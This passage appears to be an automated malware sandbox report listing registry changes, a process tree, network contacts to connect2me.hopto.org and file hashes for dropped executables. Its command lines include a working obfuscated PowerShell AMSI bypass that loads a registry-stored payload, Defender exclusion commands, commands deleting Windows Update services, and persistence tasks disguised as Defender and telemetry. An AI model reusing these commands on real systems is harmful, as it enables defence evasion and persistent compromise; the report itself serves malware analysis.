| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe
"C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1180 -ip 1180
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 252
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4800 -ip 4800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 284
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:jnyXNorqFmFo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CxeoJMEHZsuTXm,[Parameter(Position=1)][Type]$GaiTtMjAHz)$SxBlOKdvzlW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+'mo'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+'T'+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+''+'u'+''+'b'+''+'l'+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+'d'+[Char](44)+'A'+[Char](110)+''+'s'+'i'+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+',Au'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$SxBlOKdvzlW.DefineConstructor(''+'R'+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+'a'+''+'m'+''+[Char](101)+','+[Char](72)+'id'+[Char](101)+''+'B'+'yS'+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$CxeoJMEHZsuTXm).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+'age'+[Char](100)+'');$SxBlOKdvzlW.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+'H'+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+''+[Char](78)+''+'e'+'wS'+[Char](108)
+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$GaiTtMjAHz,$CxeoJMEHZsuTXm).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $SxBlOKdvzlW.CreateType();}$SVGvDMWwBhPmm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+[Char](100)+'ll')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+'s'+'o'+''+[Char](102)+''+'t'+''+'.'+'W'+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'S'+''+[Char](86)+''+'G'+''+'v'+''+[Char](68)+''+'M'+''+[Char](87)+'w'+'B'+''+'h'+'Pm'+[Char](109)+'');$biiYoPOTRzlHNf=$SVGvDMWwBhPmm.GetMethod(''+[Char](98)+''+'i'+''+'i'+''+'Y'+'oPOT'+'R'+''+[Char](122)+''+[Char](108)+''+'H'+'Nf',[Reflection.BindingFlags]''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+'tat'+'i'+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XNlmVKRViYXqPLPwQzV=jnyXNorqFmFo @([String])([IntPtr]);$fIQJMkuvtTFRbURhYElxAe=jnyXNorqFmFo 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MgiNMlfaNjy=$SVGvDMWwBhPmm.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+'a'+'n'+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+'n'+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+'.d'+[Char](108)+''+'l'+'')));$QyautjAwlxElqZ=$biiYoPOTRzlHNf.Invoke($Null,@([Object]$MgiNMlfaNjy,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+'r'+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$bUotXLQPVcSutqkkD=$biiYoPOTRzlHNf.Invoke($Null,@([Object]$MgiNMlfaNjy,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+''+[Char](80)+''+'r'+''+[Char](111)+'te'+'c'+'t')));$EsJrIny=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QyautjAwlxElqZ,$XNlmVKRViYXqPLPwQzV).Invoke(''+[Char](97)+''+[Char](109)+'si.'+'d'+''+'l'+''+'l'+'');$HcToesCIouSvsWAcb=$biiYoPOTRzlHNf.Invoke($Null,@([Object]$EsJrIny,[Object](''+'A'+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+'er')));$bznzqYzMhj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bUotXLQPVcSutqkkD,$fIQJMkuvtTFRbURhYElxAe).Invoke($HcToesCIouSvsWAcb,[uint32]8,4,[ref]$bznzqYzMhj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HcToesCIouSvsWAcb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bUotXLQPVcSutqkkD,$fIQJMkuvtTFRbURhYElxAe).Invoke($HcToesCIouSvsWAcb,[uint32]8,0x20,[ref]$bznzqYzMhj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('di'+[Char](97)+''+'l'+''+'e'+''+'r'+'sta'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ad4086f3-73e0-4394-9657-9f4e087405a6}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4204 -s 836
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3284 -s 764
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 3216 -ip 3216
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3216 -s 368
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 2908 -ip 2908
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2908 -s 464
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | connect2me.hopto.org | udp |
| N/A | 37.139.129.113:443 | connect2me.hopto.org | tcp |
| N/A | 20.44.10.122:443 | | tcp |
| N/A | 107.182.129.73:21733 | | tcp |
| N/A | 8.238.21.126:80 | | tcp |
| N/A | 8.238.21.126:80 | | tcp |
| N/A | 8.238.21.126:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 95b5d975377c32a6ef28bbf4018379ec |
| SHA1 | a27a10c1e0afa57f0341ea6529adb9854ae9e6ee |
| SHA256 | 99d85f152acf2a98615b3c2dc1fc0a2bde5d960871d7625d93b8c9c80744e2b8 |
| SHA512 | ab12d12cd182873162b972617a07c20376aa502377ad6c6998558def326b8fd206d9168d3a17ef3a19f5f86b9eca5833823ce89590a8824ee25b7032b803345b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 124edf3ad57549a6e475f3bc4e6cfe51 |
| SHA1 | 80f5187eeebb4a304e9caa0ce66fcd78c113d634 |
| SHA256 | 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675 |
| SHA512 | b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | bdb25c22d14ec917e30faf353826c5de |
| SHA1 | 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190 |
| SHA256 | e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495 |
| SHA512 | b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c697637a9b17f577fccd7e83a5495810 |
| SHA1 | 04e6054584786b88994b0e0a871562227fe2a435 |
| SHA256 | 54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164 |
| SHA512 | 66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C3D.tmp.csv
| MD5 | f993580670e3aef0530dbdfdd52e94ca |
| SHA1 | 0147d041f26bddd0dbb53159b35240542aaa154b |
| SHA256 | 88ef519bcb69ad486b6f68a2ddc293fc39f921425801b592240d221210ac812c |
| SHA512 | f5af66fd5b40b51f49cf4818d174c994e77eece8088cd0b2d4cd7c3846a26e743089d22d2f743fb5bc3abb53d9de27bee85066943b6f05ce5d2608fc88fd3566 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C6D.tmp.csv
| MD5 | b27e865aeac2f30edb1a7421f69b706b |
| SHA1 | d6c5f66386f5882eb34a22e8d2fe9f46585289f7 |
| SHA256 | c06fe2e6c1a21a99af76b67f9d30a871d883c00571da6061a464ad45c39c4f8d |
| SHA512 | b3bdc62fa35e497bc9b4c922b1a9e14794574cc8da89decd716fdcde8ce203e2164e5d644a54ca8adc37cc00647b0d1c0aa23b134d1769df694d3eb988879914 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C7D.tmp.txt
| MD5 | b67d0c36c8d127de55331c2f01d276ee |
| SHA1 | 966d07d31b845dc7a3b17a1ce96a6ebca827cf8f |
| SHA256 | f8f1fdcd622844f6c78d8fa131a83a275030b23cb50b14c409094054c0b2be1a |
| SHA512 | 6a32af0f9b9c28d811b34f32c7be1d5ef3e58f00fb624965f82796951940f3c63bd53e73314efb44f3a3e0982e5808ceb03ab18195a55b2a46510e347e3a1cdd |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3CDC.tmp.txt
| MD5 | 62abcce7bfae19943d01ae631ccba052 |
| SHA1 | 13c7ab9038fb7778d093688891aab710315e5e93 |
| SHA256 | 438b62b424ca1a722bb0d5da18e9d5a415e655931fc96846c20576973de29461 |
| SHA512 | 7ab8c195a1fa003c9d6109d2d5fc790306dc22e4b98e48a1c89b5b4d37fe0a60010c7edc82d4b1e0db614db0681b9aae317318c296b5e7d174045c26a4f63822 |
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD67D.tmp.csv
| MD5 | 7a0fc09afe684df626cb0946e7adecea |
| SHA1 | 519476614bec773806949a5062a9a1b88ceb8a8e |
| SHA256 | a389f12dda67595460d6126d4892f20e0611438592b896c0286d8ee1102b8aa6 |
| SHA512 | faf437df3261759f906c2ea180b02e707d9723807f32c42cf0513014b4192eef02e70089a32641979ba076c6bcaafeff4ef581c7f9ef728b184440d27e7c2e45 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6CC.tmp.txt
| MD5 | e4d1099730a7b3cef613e513c8ab93c1 |
| SHA1 | 07b46e39ba18f2257fa457503cf10f0ae432a2fb |
| SHA256 | aed2a3f4ed925f435e0a49755faec14ed25ae727975947e43ca2f027a434adf4 |
